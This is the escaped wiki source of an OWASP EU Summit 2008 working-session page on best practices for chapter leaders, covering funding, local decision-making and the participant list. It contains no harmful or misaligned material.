{| style=&amp;quot;width:100%&amp;quot; border=&amp;quot;0&amp;quot; align=&amp;quot;center&amp;quot;&lt;br /&gt;
 ! colspan=&amp;quot;7&amp;quot; align=&amp;quot;center&amp;quot; style=&amp;quot;background:#4058A0; color:white&amp;quot;|&amp;lt;font color=&amp;quot;white&amp;quot;&amp;gt;'''WORKING SESSION IDENTIFICATION''' &lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:15%; background:#7B8ABD&amp;quot; align=&amp;quot;center&amp;quot;|'''Work Session Name'''&lt;br /&gt;
 | colspan=&amp;quot;6&amp;quot; style=&amp;quot;width:85%; background:#cccccc&amp;quot; align=&amp;quot;left&amp;quot;|&amp;lt;font color=&amp;quot;black&amp;quot;&amp;gt;'''Best Practices for OWASP Chapter Leaders'''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:15%; background:#7B8ABD&amp;quot; align=&amp;quot;center&amp;quot;| '''Short Work Session Description''' &lt;br /&gt;
 | colspan=&amp;quot;6&amp;quot; style=&amp;quot;width:85%; background:#cccccc&amp;quot; align=&amp;quot;left&amp;quot;|The aim of the Workshop is to identify existing material, prepare some ideas and compile a &amp;quot;Chapter Best Practices Guideline&amp;quot; together after the Summit.&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:15%; background:#7B8ABD&amp;quot; align=&amp;quot;center&amp;quot;| '''Related Projects (if any)''' &lt;br /&gt;
 | colspan=&amp;quot;6&amp;quot; style=&amp;quot;width:85%; background:#cccccc&amp;quot; align=&amp;quot;left&amp;quot;|[[:Category:OWASP_Chapter|OWASP Chapters]]&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:25%; background:#7B8ABD&amp;quot; align=&amp;quot;center&amp;quot;|'''Email Contacts &amp;amp; Roles'''&lt;br /&gt;
 | style=&amp;quot;width:25%; background:#cccccc&amp;quot; align=&amp;quot;center&amp;quot;|'''Chair'''&amp;lt;br&amp;gt;[mailto:georg.hess(at)artofdefence.com '''Georg Heß''']&lt;br /&gt;
 | style=&amp;quot;width:25%; background:#cccccc&amp;quot; align=&amp;quot;center&amp;quot;|'''Secretary'''&amp;lt;br&amp;gt;[mailto:seba(at)owasp.org '''Sebastien Deleersnyder''']&lt;br /&gt;
 | style=&amp;quot;width:25%; background:#cccccc&amp;quot; align=&amp;quot;center&amp;quot;|'''Mailing list'''&amp;lt;br&amp;gt;[https://lists.owasp.org/mailman/listinfo/owasp-leaders '''Subscription Page''']&lt;br /&gt;
 |}&lt;br /&gt;
{| style=&amp;quot;width:100%&amp;quot; border=&amp;quot;0&amp;quot; align=&amp;quot;center&amp;quot;&lt;br /&gt;
 ! colspan=&amp;quot;7&amp;quot; align=&amp;quot;center&amp;quot; style=&amp;quot;background:#4058A0; color:white&amp;quot;|&amp;lt;font color=&amp;quot;white&amp;quot;&amp;gt;'''WORKING SESSION SPECIFICS''' &lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:15%; background:#7B8ABD&amp;quot; align=&amp;quot;center&amp;quot;|'''Objectives'''&lt;br /&gt;
 | colspan=&amp;quot;6&amp;quot; style=&amp;quot;width:85%; background:#cccccc&amp;quot; align=&amp;quot;left&amp;quot;|&amp;lt;font color=&amp;quot;black&amp;quot;&amp;gt;&lt;br /&gt;
You´ve already started a local Chapter and know the Chapter rules &amp;quot;by heart&amp;quot;. However, you most certainly have questions about growing, financing and &amp;quot;local&amp;quot; vs. &amp;quot;board&amp;quot; decision-making processes... The aim of the Workshop is to identify existing material, prepare some ideas and compile a &amp;quot;Chapter Best Practices Guideline&amp;quot; together after the Summit. Typical challenges are:&lt;br /&gt;
* Money: Where can I get funds from for growing my chapter - e.g. marketing efforts, organisational costs, etc... e.g. OWASP membership fees of local members/portions of it to be credited to the local chapter&lt;br /&gt;
* &amp;quot;Local&amp;quot; decisions: What can the local chapter decide upon e.g. &amp;quot;local PR messages (non English), (local) projects (perhaps as a start of international projects) - using professional help for setting up conferences etc.&lt;br /&gt;
* covering costs for &amp;quot;reasonable&amp;quot; translation efforts..&lt;br /&gt;
* Creating a local &amp;quot;OWASP Foundation&amp;quot; non-profit organisation vs. working as part of the global &amp;quot;OWASP Foundation&amp;quot;&lt;br /&gt;
* Best practices building &amp;quot;local boards&amp;quot; etc.&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:25%; background:#7B8ABD&amp;quot; align=&amp;quot;center&amp;quot;|'''Venue/Date&amp;amp;Time/Model'''&lt;br /&gt;
 | style=&amp;quot;width:25%; background:#cccccc&amp;quot; align=&amp;quot;center&amp;quot;|'''Venue'''&amp;lt;br&amp;gt;[[:OWASP EU Summit 2008|OWASP EU Summit Portugal 2008]] &lt;br /&gt;
 | style=&amp;quot;width:25%; background:#cccccc&amp;quot; align=&amp;quot;center&amp;quot;|'''Date&amp;amp;Time'''&amp;lt;br&amp;gt;November 5 &amp;amp; 7, 2008&amp;lt;br&amp;gt;Time TBD&lt;br /&gt;
 | style=&amp;quot;width:25%; background:#cccccc&amp;quot; align=&amp;quot;center&amp;quot;|'''Discussion Model'''&amp;lt;br&amp;gt;&amp;quot;Participants + Attendees&amp;quot;&lt;br /&gt;
 |}&lt;br /&gt;
{| style=&amp;quot;width:100%&amp;quot; border=&amp;quot;0&amp;quot; align=&amp;quot;center&amp;quot;&lt;br /&gt;
 ! colspan=&amp;quot;7&amp;quot; align=&amp;quot;center&amp;quot; style=&amp;quot;background:white; color:white&amp;quot;|&amp;lt;font color=&amp;quot;black&amp;quot;&amp;gt;&lt;br /&gt;
 |}&lt;br /&gt;
&lt;br /&gt;
{|style=&amp;quot;width:100%&amp;quot; border=&amp;quot;0&amp;quot; align=&amp;quot;center&amp;quot;&lt;br /&gt;
 ! colspan=&amp;quot;7&amp;quot; align=&amp;quot;center&amp;quot; style=&amp;quot;background:#4058A0; color:white&amp;quot;|&amp;lt;font color=&amp;quot;white&amp;quot;&amp;gt;'''WORKING SESSION OPERATIONAL RESOURCES''' &lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:100%; background:#cccccc&amp;quot; align=&amp;quot;center&amp;quot;|Please add here, ASAP, any needed relevant resources, e.g. data-show, boards, laptops, etc.&lt;br /&gt;
 |}&lt;br /&gt;
{| style=&amp;quot;width:100%&amp;quot; border=&amp;quot;0&amp;quot; align=&amp;quot;center&amp;quot;&lt;br /&gt;
 ! colspan=&amp;quot;7&amp;quot; align=&amp;quot;center&amp;quot; style=&amp;quot;background:white; color:white&amp;quot;|&amp;lt;font color=&amp;quot;black&amp;quot;&amp;gt;&lt;br /&gt;
 |}&lt;br /&gt;
{| style=&amp;quot;width:100%&amp;quot; border=&amp;quot;0&amp;quot; align=&amp;quot;center&amp;quot;&lt;br /&gt;
 ! colspan=&amp;quot;7&amp;quot; align=&amp;quot;center&amp;quot; style=&amp;quot;background:#4058A0; color:white&amp;quot;|&amp;lt;font color=&amp;quot;white&amp;quot;&amp;gt;'''WORKING SESSION ADDITIONAL DETAILS''' &lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:100%; background:#cccccc&amp;quot; align=&amp;quot;center&amp;quot;|Please add here, any additional notes, links, ideas, guidelines, etc... The objective is to help the working sessions participants and attendees to prepare their participation/contribution&lt;br /&gt;
 |}&lt;br /&gt;
{| style=&amp;quot;width:100%&amp;quot; border=&amp;quot;0&amp;quot; align=&amp;quot;center&amp;quot;&lt;br /&gt;
 ! colspan=&amp;quot;3&amp;quot; align=&amp;quot;center&amp;quot; style=&amp;quot;background:#4058A0; color:white&amp;quot;|'''WORKING SESSION OUTCOMES''' &lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:7%; background:#6C82B5&amp;quot; align=&amp;quot;center&amp;quot;|Statements, Initiatives or Decisions &lt;br /&gt;
 | style=&amp;quot;width:46%; background:#b3b3b3&amp;quot; align=&amp;quot;center&amp;quot;|'''Proposed by Working Group''' &lt;br /&gt;
 | style=&amp;quot;width:47%; background:#b3b3b3&amp;quot; align=&amp;quot;center&amp;quot;|'''Approved by OWASP Board'''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:7%; background:#7B8ABD&amp;quot; align=&amp;quot;center&amp;quot;| &lt;br /&gt;
 | style=&amp;quot;width:46%; background:#C2C2C2&amp;quot; align=&amp;quot;center&amp;quot;|Best Practices for OWASP Chapter Leaders.&lt;br /&gt;
 | style=&amp;quot;width:47%; background:#C2C2C2&amp;quot; align=&amp;quot;center&amp;quot;|After the Board Meeting - fill in here. &lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:7%; background:#7B8ABD&amp;quot; align=&amp;quot;center&amp;quot;| &lt;br /&gt;
 | style=&amp;quot;width:46%; background:#C2C2C2&amp;quot; align=&amp;quot;center&amp;quot;|Fill in here.&lt;br /&gt;
 | style=&amp;quot;width:47%; background:#C2C2C2&amp;quot; align=&amp;quot;center&amp;quot;|After the Board Meeting - fill in here. &lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:7%; background:#7B8ABD&amp;quot; align=&amp;quot;center&amp;quot;|&lt;br /&gt;
 | style=&amp;quot;width:46%; background:#C2C2C2&amp;quot; align=&amp;quot;center&amp;quot;|Fill in here.&lt;br /&gt;
 | style=&amp;quot;width:47%; background:#C2C2C2&amp;quot; align=&amp;quot;center&amp;quot;|After the Board Meeting - fill in here. &lt;br /&gt;
  |}&lt;br /&gt;
== Working Session Participants ==&lt;br /&gt;
(Add you name by editing this table. On your the right, just above the this frame, you have the option to edit)&lt;br /&gt;
{| style=&amp;quot;width:100%&amp;quot; border=&amp;quot;0&amp;quot; align=&amp;quot;center&amp;quot;&lt;br /&gt;
 ! colspan=&amp;quot;7&amp;quot; align=&amp;quot;center&amp;quot; style=&amp;quot;background:#4058A0; color:white&amp;quot;|&amp;lt;font color=&amp;quot;white&amp;quot;&amp;gt;'''WORKING SESSION PARTICIPANTS''' &lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:7%; background:#7B8ABD&amp;quot; align=&amp;quot;center&amp;quot;|&lt;br /&gt;
 | style=&amp;quot;width:15%; background:#cccccc&amp;quot; align=&amp;quot;center&amp;quot;|'''Name'''&lt;br /&gt;
 | style=&amp;quot;width:15%; background:#cccccc&amp;quot; align=&amp;quot;center&amp;quot;|'''Company'''&lt;br /&gt;
 | style=&amp;quot;width:63%; background:#cccccc&amp;quot; align=&amp;quot;center&amp;quot;|'''Notes &amp;amp; reason for participating, issues to be discussed/addressed'''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:7%; background:#7B8ABD&amp;quot; align=&amp;quot;center&amp;quot;|1&lt;br /&gt;
 | style=&amp;quot;width:15%; background:#cccccc&amp;quot; align=&amp;quot;center&amp;quot;| Tom Brennan&lt;br /&gt;
 | style=&amp;quot;width:15%; background:#cccccc&amp;quot; align=&amp;quot;center&amp;quot;|&lt;br /&gt;
 | style=&amp;quot;width:63%; background:#cccccc&amp;quot; align=&amp;quot;center&amp;quot;|&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:7%; background:#7B8ABD&amp;quot; align=&amp;quot;center&amp;quot;|2&lt;br /&gt;
 | style=&amp;quot;width:15%; background:#cccccc&amp;quot; align=&amp;quot;center&amp;quot;| Wayne Huang&lt;br /&gt;
 | style=&amp;quot;width:15%; background:#cccccc&amp;quot; align=&amp;quot;center&amp;quot;|&lt;br /&gt;
 | style=&amp;quot;width:63%; background:#cccccc&amp;quot; align=&amp;quot;center&amp;quot;|&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:7%; background:#7B8ABD&amp;quot; align=&amp;quot;center&amp;quot;|3&lt;br /&gt;
 | style=&amp;quot;width:15%; background:#cccccc&amp;quot; align=&amp;quot;center&amp;quot;|Andrzej Targosz&lt;br /&gt;
 | style=&amp;quot;width:15%; background:#cccccc&amp;quot; align=&amp;quot;center&amp;quot;|OWASP Poland&lt;br /&gt;
 | style=&amp;quot;width:63%; background:#cccccc&amp;quot; align=&amp;quot;center&amp;quot;|&lt;br /&gt;
|-&lt;br /&gt;
 | style=&amp;quot;width:7%; background:#7B8ABD&amp;quot; align=&amp;quot;center&amp;quot;|4&lt;br /&gt;
 | style=&amp;quot;width:15%; background:#cccccc&amp;quot; align=&amp;quot;center&amp;quot;|David Campbell&lt;br /&gt;
 | style=&amp;quot;width:15%; background:#cccccc&amp;quot; align=&amp;quot;center&amp;quot;|OWASP Denver&lt;br /&gt;
 | style=&amp;quot;width:63%; background:#cccccc&amp;quot; align=&amp;quot;center&amp;quot;|&lt;br /&gt;
|-&lt;br /&gt;
 | style=&amp;quot;width:7%; background:#7B8ABD&amp;quot; align=&amp;quot;center&amp;quot;|5&lt;br /&gt;
 | style=&amp;quot;width:15%; background:#cccccc&amp;quot; align=&amp;quot;center&amp;quot;|Carlos Serrao&lt;br /&gt;
 | style=&amp;quot;width:15%; background:#cccccc&amp;quot; align=&amp;quot;center&amp;quot;|ISCTE/Adetti, OWASP Portugal&lt;br /&gt;
 | style=&amp;quot;width:63%; background:#cccccc&amp;quot; align=&amp;quot;center&amp;quot;|Leader of the OWASP Portugal&lt;br /&gt;
|-&lt;br /&gt;
 | style=&amp;quot;width:7%; background:#7B8ABD&amp;quot; align=&amp;quot;center&amp;quot;|6&lt;br /&gt;
 | style=&amp;quot;width:15%; background:#cccccc&amp;quot; align=&amp;quot;center&amp;quot;|Joaquim Marques&lt;br /&gt;
 | style=&amp;quot;width:15%; background:#cccccc&amp;quot; align=&amp;quot;center&amp;quot;|IPCB/EST, OWASP Portugal&lt;br /&gt;
 | style=&amp;quot;width:63%; background:#cccccc&amp;quot; align=&amp;quot;center&amp;quot;|Member of OWASP Portugal&lt;br /&gt;
|-&lt;br /&gt;
 | style=&amp;quot;width:7%; background:#7B8ABD&amp;quot; align=&amp;quot;center&amp;quot;|7&lt;br /&gt;
 | style=&amp;quot;width:15%; background:#cccccc&amp;quot; align=&amp;quot;center&amp;quot;|Pavol Luptak&lt;br /&gt;
 | style=&amp;quot;width:15%; background:#cccccc&amp;quot; align=&amp;quot;center&amp;quot;|Nethemba s.r.o., OWASP Slovakia&lt;br /&gt;
 | style=&amp;quot;width:63%; background:#cccccc&amp;quot; align=&amp;quot;center&amp;quot;|Leader of the OWASP Slovakia&lt;br /&gt;
|-&lt;br /&gt;
 | style=&amp;quot;width:7%; background:#7B8ABD&amp;quot; align=&amp;quot;center&amp;quot;|8&lt;br /&gt;
 | style=&amp;quot;width:15%; background:#cccccc&amp;quot; align=&amp;quot;center&amp;quot;|Leonardo Cavallari Militelli&lt;br /&gt;
 | style=&amp;quot;width:15%; background:#cccccc&amp;quot; align=&amp;quot;center&amp;quot;|E-VAL Tecnologia&lt;br /&gt;
 | style=&amp;quot;width:63%; background:#cccccc&amp;quot; align=&amp;quot;center&amp;quot;|OWASP Brasil - most active contributor&lt;br /&gt;
|-&lt;br /&gt;
 | style=&amp;quot;width:7%; background:#7B8ABD&amp;quot; align=&amp;quot;center&amp;quot;|9&lt;br /&gt;
 | style=&amp;quot;width:15%; background:#cccccc&amp;quot; align=&amp;quot;center&amp;quot;|Wagner Elias&lt;br /&gt;
 | style=&amp;quot;width:15%; background:#cccccc&amp;quot; align=&amp;quot;center&amp;quot;|Conviso IT Security&lt;br /&gt;
 | style=&amp;quot;width:63%; background:#cccccc&amp;quot; align=&amp;quot;center&amp;quot;|OWASP Brazil Chapter Lead&lt;br /&gt;
|-&lt;br /&gt;
 | style=&amp;quot;width:7%; background:#7B8ABD&amp;quot; align=&amp;quot;center&amp;quot;|10&lt;br /&gt;
 | style=&amp;quot;width:15%; background:#cccccc&amp;quot; align=&amp;quot;center&amp;quot;|&lt;br /&gt;
 | style=&amp;quot;width:15%; background:#cccccc&amp;quot; align=&amp;quot;center&amp;quot;|&lt;br /&gt;
 | style=&amp;quot;width:63%; background:#cccccc&amp;quot; align=&amp;quot;center&amp;quot;|&lt;br /&gt;
 |}&lt;br /&gt;
If needed add here more lines.&lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP_Working_Session]]&lt;/div&gt;</summary>
		<author><name>Wagner.elias</name></author>	</entry>

	</feed>